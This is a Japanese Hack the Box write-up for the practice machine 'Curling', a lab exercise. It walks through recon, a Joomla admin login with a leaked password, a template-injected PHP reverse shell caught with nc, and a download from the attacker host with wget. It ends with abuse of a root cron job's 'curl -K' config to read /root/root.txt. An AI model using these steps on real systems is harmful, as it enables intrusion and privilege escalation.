はじめに
筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter
cheat sheet
以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET
machine について
難易度は easy です。
nmap
kali@kali:~$ nmap -sC -sV 10.10.10.150
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-25 02:54 EDT
Nmap scan report for 10.10.10.150
Host is up (0.26s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
| 256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_ 256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.58 secondsgobuster
kali@kali:~$ gobuster dir -u http://10.10.10.150 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40 -x txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.150
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
2020/05/25 04:58:48 Starting gobuster
===============================================================
/images (Status: 301)
/templates (Status: 301)
/media (Status: 301)
/modules (Status: 301)
/bin (Status: 301)
/plugins (Status: 301)
/includes (Status: 301)
/language (Status: 301)
/README.txt (Status: 200)
/components (Status: 301)
/cache (Status: 301)
/libraries (Status: 301)
/tmp (Status: 301)
/LICENSE.txt (Status: 200)
/layouts (Status: 301)
/secret.txt (Status: 200)
/administrator (Status: 301)
/htaccess.txt (Status: 200)
/cli (Status: 301)
/server-status (Status: 403)
===============================================================
2020/05/25 05:45:10 Finished
===============================================================secret.txt を開くと Q3VybGluZzIwMTgh という文字列が出てきます
base64 で decode
kali@kali:~$ echo Q3VybGluZzIwMTgh | base64 -d
Curling2018!login
/administrator から login します Floris/Curling2018!でログインに成功します(Floris はブログ記事に名前があるので推測
template をいじる
色々見てたら template というところからサイトの php ファイルを弄れそうです
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
php ファイルを reverse-shell 用に編集します
これで nc で listen しておけば reverse shell が取れます
探索
kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.32] from (UNKNOWN) [10.10.10.150] 48028
Linux curling 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
10:09:12 up 3:18, 0 users, load average: 0.04, 0.03, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls
ls
bin home lib64 opt sbin sys vmlinuz
boot initrd.img lost+found proc snap tmp vmlinuz.old
dev initrd.img.old media root srv usr
etc lib mnt run swap.img var
$ whoami
whoami
www-data
$ ls -ll
ls -ll
total 12
drwxr-x--- 2 root floris 4096 May 22 2018 admin-area
-rw-r--r-- 1 floris floris 1076 May 22 2018 password_backup
-rw-r----- 1 floris floris 33 May 22 2018 user.txt
$ cat password_backup
cat password_backup
00000000: 425a 6839 3141 5926 5359 819b bb48 0000 BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34 ....A...P)ava.:4
00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960 N...n.T.#.@%...`
00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000 ......z.@......
00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800 ..i.4hdi...9.h..
00000050: 000f 51a0 0064 681a 069e a190 0000 0034 ..Q..dh........4
00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0 i...5.n......J..
00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78 .h...*..}y..<~.x
00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931 .>...sVT.zH....1
00000090: c856 921b 1221 3385 6046 a2dd c173 0d22 .V...!3.`F...s."
000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290 ..n....7j:X.d.R.
000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503 .k./... ....)p..
000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843 7..;.....9...P.C
000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c .Y.P...HB....*..
000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090 .G.. [email protected].
000000f0: 819b bb48 ...Hなんか dump が出てきました
出てきたファイルを分析
出てきたファイルの内容を pwd_bp として手元の Kali に保存しました
kali@kali:~$ cat pwd_bp | xxd -r > pwd
kali@kali:~$ mv pwd pwd.bz2
kali@kali:~$ bzip2 -d pwd.bz2
kali@kali:~$ ls
AutoRecon com Desktop Documents Downloads hacking-lab htb idafree-7.0 impacket mnt Music Pictures Public pwd pwd_bp __pycache__ SecLists Templates unicorn Videos vpn Windows-Exploit-Suggester
kali@kali:~$ file pwd
pwd: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix, original size modulo 2^32 141
kali@kali:~$ mv pwd pwd.gz
kali@kali:~$ gzip -d pwd.gz
kali@kali:~$ ls
AutoRecon com Desktop Documents Downloads hacking-lab htb idafree-7.0 impacket mnt Music Pictures Public pwd pwd_bp __pycache__ SecLists Templates unicorn Videos vpn Windows-Exploit-Suggester
kali@kali:~$ file pwd
pwd: bzip2 compressed data, block size = 900k
kali@kali:~$ mv pwd pwd.bz2
kali@kali:~$ bzip2 -d pwd.bz2
kali@kali:~$ ls
AutoRecon com Desktop Documents Downloads hacking-lab htb idafree-7.0 impacket mnt Music Pictures Public pwd pwd_bp __pycache__ SecLists Templates unicorn Videos vpn Windows-Exploit-Suggester
kali@kali:~$ file pwd
pwd: POSIX tar archive (GNU)
kali@kali:~$ mv pwd pwd.tar
kali@kali:~$ tar -xf pwd.tar
kali@kali:~$ cat password.txt
5d<wdCbdZu)|hChXllpassword が出てきました
ssh ログイン
出てきた password でログインしてみます
kali@kali:~$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-22-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon May 25 10:42:18 UTC 2020
System load: 0.0 Processes: 172
Usage of /: 47.1% of 9.78GB Users logged in: 0
Memory usage: 27% IP address for ens33: 10.10.10.150
Swap usage: 0%
0 packages can be updated.
0 updates are security updates.
Last login: Mon May 28 17:00:48 2018 from 192.168.1.71
floris@curling:~$これで user.txt が取れます
探索 again
少し探索してみます
floris@curling:~$ ls
admin-area password_backup user.txt
floris@curling:~$ cd admin-area/
floris@curling:~/admin-area$ ls
input report
floris@curling:~/admin-area$ cat input
url = "http://127.0.0.1"
floris@curling:~/admin-area$ cat report
(略)(index.phpぽい内容)pspy
sudo -lは使えませんでした。
pspy でへんな何かが実行されてないか調べます
floris@curling:~$ wget http://10.10.14.32:8000/pspy64
--2020-05-25 11:00:30-- http://10.10.14.32:8000/pspy64
Connecting to 10.10.14.32:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[=======================================================================================================================================>] 2.94M 716KB/s in 8.5s
2020-05-25 11:00:39 (353 KB/s) - ‘pspy64’ saved [3078592/3078592]
floris@curling:~$ ls
admin-area password_backup pspy64 user.txt
floris@curling:~$ ./pspy64
-bash: ./pspy64: Permission denied
floris@curling:~$ chmod +x pspy64
floris@curling:~$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/05/25 11:01:52 CMD: UID=0 PID=991 | /usr/lib/accountsservice/accounts-daemon
2020/05/25 11:01:52 CMD: UID=0 PID=95 |
2020/05/25 11:01:52 CMD: UID=0 PID=9 |
2020/05/25 11:01:52 CMD: UID=0 PID=89 |
2020/05/25 11:01:52 CMD: UID=0 PID=88 |
2020/05/25 11:01:52 CMD: UID=0 PID=87 |
2020/05/25 11:01:52 CMD: UID=0 PID=86 |
2020/05/25 11:01:52 CMD: UID=101 PID=851 | /lib/systemd/systemd-resolved
2020/05/25 11:01:52 CMD: UID=0 PID=85 |
2020/05/25 11:01:52 CMD: UID=0 PID=84 |
2020/05/25 11:01:52 CMD: UID=100 PID=822 | /lib/systemd/systemd-networkd
2020/05/25 11:01:52 CMD: UID=0 PID=8 |
2020/05/25 11:01:52 CMD: UID=0 PID=7 |
2020/05/25 11:01:52 CMD: UID=62583 PID=627 | /lib/systemd/systemd-timesyncd
2020/05/25 11:01:52 CMD: UID=0 PID=6 |
2020/05/25 11:01:52 CMD: UID=0 PID=533 |
2020/05/25 11:01:52 CMD: UID=0 PID=519 |
2020/05/25 11:01:52 CMD: UID=0 PID=505 |
2020/05/25 11:01:52 CMD: UID=0 PID=504 |
2020/05/25 11:01:52 CMD: UID=0 PID=503 |
2020/05/25 11:01:52 CMD: UID=0 PID=502 |
2020/05/25 11:01:52 CMD: UID=0 PID=500 | /lib/systemd/systemd-udevd
2020/05/25 11:01:52 CMD: UID=0 PID=496 |
2020/05/25 11:01:52 CMD: UID=0 PID=482 | /sbin/lvmetad -f
2020/05/25 11:01:52 CMD: UID=0 PID=480 | /lib/systemd/systemd-journald
2020/05/25 11:01:52 CMD: UID=0 PID=471 | /usr/bin/vmtoolsd
2020/05/25 11:01:52 CMD: UID=0 PID=42 |
2020/05/25 11:01:52 CMD: UID=0 PID=412 |
2020/05/25 11:01:52 CMD: UID=0 PID=411 |
2020/05/25 11:01:52 CMD: UID=0 PID=41 |
2020/05/25 11:01:52 CMD: UID=0 PID=4 |
2020/05/25 11:01:52 CMD: UID=0 PID=39 |
2020/05/25 11:01:52 CMD: UID=0 PID=37 |
2020/05/25 11:01:52 CMD: UID=0 PID=365 |
2020/05/25 11:01:52 CMD: UID=0 PID=36 |
2020/05/25 11:01:52 CMD: UID=0 PID=35 |
2020/05/25 11:01:52 CMD: UID=0 PID=34 |
2020/05/25 11:01:52 CMD: UID=0 PID=33 |
2020/05/25 11:01:52 CMD: UID=0 PID=32 |
2020/05/25 11:01:52 CMD: UID=0 PID=31 |
2020/05/25 11:01:52 CMD: UID=0 PID=30 |
2020/05/25 11:01:52 CMD: UID=0 PID=295 |
2020/05/25 11:01:52 CMD: UID=0 PID=293 |
2020/05/25 11:01:52 CMD: UID=0 PID=29 |
2020/05/25 11:01:52 CMD: UID=0 PID=288 |
2020/05/25 11:01:52 CMD: UID=0 PID=284 |
2020/05/25 11:01:52 CMD: UID=0 PID=28 |
2020/05/25 11:01:52 CMD: UID=0 PID=27 |
2020/05/25 11:01:52 CMD: UID=0 PID=264 |
2020/05/25 11:01:52 CMD: UID=0 PID=263 |
2020/05/25 11:01:52 CMD: UID=0 PID=262 |
2020/05/25 11:01:52 CMD: UID=0 PID=261 |
2020/05/25 11:01:52 CMD: UID=0 PID=260 |
2020/05/25 11:01:52 CMD: UID=0 PID=26 |
2020/05/25 11:01:52 CMD: UID=0 PID=259 |
2020/05/25 11:01:52 CMD: UID=0 PID=258 |
2020/05/25 11:01:52 CMD: UID=0 PID=257 |
2020/05/25 11:01:52 CMD: UID=0 PID=256 |
2020/05/25 11:01:52 CMD: UID=0 PID=255 |
2020/05/25 11:01:52 CMD: UID=0 PID=254 |
2020/05/25 11:01:52 CMD: UID=0 PID=253 |
2020/05/25 11:01:52 CMD: UID=0 PID=252 |
2020/05/25 11:01:52 CMD: UID=0 PID=251 |
2020/05/25 11:01:52 CMD: UID=0 PID=250 |
2020/05/25 11:01:52 CMD: UID=0 PID=25 |
2020/05/25 11:01:52 CMD: UID=0 PID=249 |
2020/05/25 11:01:52 CMD: UID=0 PID=248 |
2020/05/25 11:01:52 CMD: UID=0 PID=247 |
2020/05/25 11:01:52 CMD: UID=0 PID=246 |
2020/05/25 11:01:52 CMD: UID=0 PID=245 |
2020/05/25 11:01:52 CMD: UID=0 PID=244 |
2020/05/25 11:01:52 CMD: UID=0 PID=243 |
2020/05/25 11:01:52 CMD: UID=0 PID=242 |
2020/05/25 11:01:52 CMD: UID=0 PID=241 |
2020/05/25 11:01:52 CMD: UID=0 PID=240 |
2020/05/25 11:01:52 CMD: UID=0 PID=24 |
2020/05/25 11:01:52 CMD: UID=0 PID=239 |
2020/05/25 11:01:52 CMD: UID=0 PID=238 |
2020/05/25 11:01:52 CMD: UID=0 PID=237 |
2020/05/25 11:01:52 CMD: UID=0 PID=236 |
2020/05/25 11:01:52 CMD: UID=0 PID=235 |
2020/05/25 11:01:52 CMD: UID=0 PID=234 |
2020/05/25 11:01:52 CMD: UID=0 PID=233 |
2020/05/25 11:01:52 CMD: UID=0 PID=232 |
2020/05/25 11:01:52 CMD: UID=0 PID=231 |
2020/05/25 11:01:52 CMD: UID=0 PID=230 |
2020/05/25 11:01:52 CMD: UID=0 PID=23 |
2020/05/25 11:01:52 CMD: UID=0 PID=229 |
2020/05/25 11:01:52 CMD: UID=0 PID=228 |
2020/05/25 11:01:52 CMD: UID=0 PID=227 |
2020/05/25 11:01:52 CMD: UID=0 PID=226 |
2020/05/25 11:01:52 CMD: UID=0 PID=225 |
2020/05/25 11:01:52 CMD: UID=0 PID=224 |
2020/05/25 11:01:52 CMD: UID=0 PID=223 |
2020/05/25 11:01:52 CMD: UID=0 PID=222 |
2020/05/25 11:01:52 CMD: UID=0 PID=221 |
2020/05/25 11:01:52 CMD: UID=0 PID=220 |
2020/05/25 11:01:52 CMD: UID=0 PID=22 |
2020/05/25 11:01:52 CMD: UID=0 PID=219 |
2020/05/25 11:01:52 CMD: UID=0 PID=218 |
2020/05/25 11:01:52 CMD: UID=0 PID=217 |
2020/05/25 11:01:52 CMD: UID=0 PID=216 |
2020/05/25 11:01:52 CMD: UID=0 PID=215 |
2020/05/25 11:01:52 CMD: UID=0 PID=214 |
2020/05/25 11:01:52 CMD: UID=0 PID=213 |
2020/05/25 11:01:52 CMD: UID=0 PID=212 |
2020/05/25 11:01:52 CMD: UID=0 PID=211 |
2020/05/25 11:01:52 CMD: UID=0 PID=210 |
2020/05/25 11:01:52 CMD: UID=0 PID=21 |
2020/05/25 11:01:52 CMD: UID=0 PID=209 |
2020/05/25 11:01:52 CMD: UID=0 PID=208 |
2020/05/25 11:01:52 CMD: UID=0 PID=207 |
2020/05/25 11:01:52 CMD: UID=0 PID=206 |
2020/05/25 11:01:52 CMD: UID=0 PID=205 |
2020/05/25 11:01:52 CMD: UID=0 PID=20 |
2020/05/25 11:01:52 CMD: UID=0 PID=2 |
2020/05/25 11:01:52 CMD: UID=0 PID=19 |
2020/05/25 11:01:52 CMD: UID=1000 PID=1890 | ./pspy64
2020/05/25 11:01:52 CMD: UID=0 PID=1854 |
2020/05/25 11:01:52 CMD: UID=1000 PID=1834 | -bash
2020/05/25 11:01:52 CMD: UID=1000 PID=1826 | sshd: floris@pts/0
2020/05/25 11:01:52 CMD: UID=0 PID=18 |
2020/05/25 11:01:52 CMD: UID=0 PID=174 |
2020/05/25 11:01:52 CMD: UID=0 PID=173 |
2020/05/25 11:01:52 CMD: UID=1000 PID=1712 | (sd-pam)
2020/05/25 11:01:52 CMD: UID=1000 PID=1705 | /lib/systemd/systemd --user
2020/05/25 11:01:52 CMD: UID=0 PID=1701 | sshd: floris [priv]
2020/05/25 11:01:52 CMD: UID=33 PID=1659 | /usr/sbin/apache2 -k start
2020/05/25 11:01:52 CMD: UID=0 PID=16 |
2020/05/25 11:01:52 CMD: UID=0 PID=15 |
2020/05/25 11:01:52 CMD: UID=0 PID=14 |
2020/05/25 11:01:52 CMD: UID=0 PID=139 |
2020/05/25 11:01:52 CMD: UID=33 PID=1365 | /usr/sbin/apache2 -k start
2020/05/25 11:01:52 CMD: UID=33 PID=1364 | /usr/sbin/apache2 -k start
2020/05/25 11:01:52 CMD: UID=33 PID=1363 | /usr/sbin/apache2 -k start
2020/05/25 11:01:52 CMD: UID=33 PID=1362 | /usr/sbin/apache2 -k start
2020/05/25 11:01:52 CMD: UID=33 PID=1361 | /usr/sbin/apache2 -k start
2020/05/25 11:01:52 CMD: UID=0 PID=1350 | /usr/sbin/apache2 -k start
2020/05/25 11:01:52 CMD: UID=0 PID=1345 | /usr/sbin/sshd -D
2020/05/25 11:01:52 CMD: UID=0 PID=13 |
2020/05/25 11:01:52 CMD: UID=0 PID=1254 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2020/05/25 11:01:52 CMD: UID=0 PID=121 |
2020/05/25 11:01:52 CMD: UID=0 PID=12 |
2020/05/25 11:01:52 CMD: UID=0 PID=1194 | /usr/lib/policykit-1/polkitd --no-debug
2020/05/25 11:01:52 CMD: UID=0 PID=1173 | /sbin/iscsid
2020/05/25 11:01:52 CMD: UID=0 PID=1172 | /sbin/iscsid
2020/05/25 11:01:52 CMD: UID=111 PID=1160 | /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid
2020/05/25 11:01:52 CMD: UID=0 PID=1148 | /usr/lib/snapd/snapd
2020/05/25 11:01:52 CMD: UID=0 PID=1123 | /usr/bin/lxcfs /var/lib/lxcfs/
2020/05/25 11:01:52 CMD: UID=102 PID=1122 | /usr/sbin/rsyslogd -n
2020/05/25 11:01:52 CMD: UID=0 PID=11 |
2020/05/25 11:01:52 CMD: UID=103 PID=1064 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2020/05/25 11:01:52 CMD: UID=0 PID=1062 | /usr/bin/VGAuthService
2020/05/25 11:01:52 CMD: UID=0 PID=1058 | /usr/bin/python3 /usr/bin/networkd-dispatcher
2020/05/25 11:01:52 CMD: UID=0 PID=1049 | /usr/sbin/cron -f
2020/05/25 11:01:52 CMD: UID=0 PID=1048 | /lib/systemd/systemd-logind
2020/05/25 11:01:52 CMD: UID=0 PID=104 |
2020/05/25 11:01:52 CMD: UID=0 PID=1012 | /usr/sbin/atd -f
2020/05/25 11:01:52 CMD: UID=0 PID=1006 | /usr/sbin/irqbalance --foreground
2020/05/25 11:01:52 CMD: UID=0 PID=10 |
2020/05/25 11:01:52 CMD: UID=0 PID=1 | /sbin/init maybe-ubiquity
2020/05/25 11:02:01 CMD: UID=0 PID=1911 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/05/25 11:02:01 CMD: UID=0 PID=1910 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/05/25 11:02:01 CMD: UID=0 PID=1909 | /usr/sbin/CRON -f
2020/05/25 11:02:01 CMD: UID=0 PID=1908 | /usr/sbin/CRON -f
2020/05/25 11:02:01 CMD: UID=0 PID=1912 | /usr/sbin/CRON -f
2020/05/25 11:02:01 CMD: UID=0 PID=1913 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/05/25 11:03:01 CMD: UID=0 PID=1922 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/05/25 11:03:01 CMD: UID=0 PID=1921 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/05/25 11:03:01 CMD: UID=0 PID=1920 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/05/25 11:03:01 CMD: UID=0 PID=1919 | /usr/sbin/CRON -f
2020/05/25 11:03:01 CMD: UID=0 PID=1918 | /usr/sbin/CRON -f
2020/05/25 11:03:01 CMD: UID=0 PID=1923 | sleep 1注目すべきは /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report です
-K, --config <file> Read config from a file
-o, --output <file> Write to file instead of stdoutcurl の結果が report に書き込まれてます
-K で input ファイルの内容を config として渡しているわけですねー
そこで input ファイルを local のファイルを参照するように編集します
floris@curling:~/admin-area$ echo 'url = "file:///root/root.txt"' > inputこれで root.txt の内容が report に書き込まれるので root ゲットです!
終わりに
良い machine でした!
その他 writeup
sudoer を書き換える方法が書いてあってこいつは天才かと思った https://hipotermia.pw/htb/curling
